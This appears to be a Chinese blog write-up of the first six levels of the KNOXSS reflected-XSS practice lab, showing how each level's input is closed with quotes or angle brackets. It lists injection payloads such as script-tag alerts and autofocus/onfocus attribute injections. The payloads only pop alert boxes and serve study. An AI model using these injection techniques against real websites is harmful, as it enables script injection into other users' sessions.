当前位置: 首页 > news >正文

XSS靶场实战(工作wuwuwu)

news 来源:原创 2025/4/30 6:03:22

knoxss

knoxss

Single Reflection Using QUERY of URL

——01

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

测试标签

<script>alert(666666)</script>

在这里插入图片描述

——02: "

在这里插入图片描述

在这里插入图片描述

<h1>test</h1>

在这里插入图片描述
没有反应,查看源码
在这里插入图片描述
现在需要闭合双引号,我计划还是先搞标签

"><h1>test</h1>

在这里插入图片描述
标签上:

"><script>alert(666666)</script>

在这里插入图片描述
在这里插入图片描述

——03: ’

在这里插入图片描述

<h1>test</h1>

在这里插入图片描述

闭合","被实体编码
在这里插入图片描述

'闭合
在这里插入图片描述

'>来闭合

'><h1>test</h1>

在这里插入图片描述
不多的时候:
在这里插入图片描述

标签上:

'><script>alert(666666)</script>

在这里插入图片描述
在这里插入图片描述

——04:" + input属性

在这里插入图片描述
在这里插入图片描述

<h1>test</h1>

在这里插入图片描述

"闭合
在这里插入图片描述
发现"闭合了,但是标签无法被闭合,只能看属性

找到 input 对应的xss属性

<input autofocus onfocus=alert(1)>

使用

"autofocus onfocus=alert(1) b="

在这里插入图片描述
刷新页面就触发!

——05: ’ + input

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

"闭合
'

‘闭合
在这里插入图片描述
闭合,但是 > 被实体编码

属性

' autofocus onfocus=alert(1) b="

'后面是否有空格 都行
在这里插入图片描述

——06

页面看不到
在这里插入图片描述
①源码搜索到:
在这里插入图片描述

再去前面找到对应的,未来edit as html

②直接搜索也可(ctrl + F)
在这里插入图片描述

<h1>test</h1>

在这里插入图片描述

"闭合
在这里插入图片描述

使用属性

" autofocus onfocus=alert(1) b="

在这里插入图片描述
自己赋值了

相关文章:

  • Python 重构“策略”模式:用函数简化设计模式的实践
  • 【图片识别改名】批量读取图片区域文字识别后批量改名,基于Python和腾讯云的实现方案
  • 1.5 点云数据获取方式——双目立体相机
  • Uniapp:设置页面下拉刷新
  • 服务器远程超出最大连接数的解决方案是什么?
  • 基于C++的IOT网关和平台1:github项目ctGateway
  • 基于DrissionPage的实习信息爬虫改造与解析
  • nginx配置集群服务器中的tcp负载均衡器
  • 中国飞机迎来历史性窗口,航空装备研制不断突破,智能化升级成为核心驱动力
  • nginx核心功能
  • 微服务开发中的应用生命周期管理
  • Javscript 字符串的常用方法有哪些?
  • k8s 学习记录 (六)_Pod 污点和容忍性详解
  • 20250429 垂直地表发射激光测量偏转可以验证相对性原理吗
  • Lua 第14部分 数据结构
  • 【论文阅读】PEEKABOO: Interactive Video Generation via Masked-Diffusion
  • Educational Codeforces Round 178 (Rated for Div. 2)
  • 在yolo中Ultralytics是什么意思呢?超越分析的智能
  • 【专题五】位运算(1):常见位运算操作总结
  • 【Java学习】Java的CGLIB动态代理:通俗解释与使用指南
  • 北京动物园:大熊猫“萌兰”没有参加日本大阪世博会的计划
  • 费高云调研党的建设工作:营造风清气正劲足的政治生态
  • 遭遇大规模停电,西班牙内政部宣布进入国家紧急状态
  • 国家能源局:支持民营企业参股投资核电项目
  • 第1现场|无军用物资!伊朗港口爆炸已遇难40人伤1200人
  • 消费维权周报|上周违规经营类投诉较多,涉诱导加盟等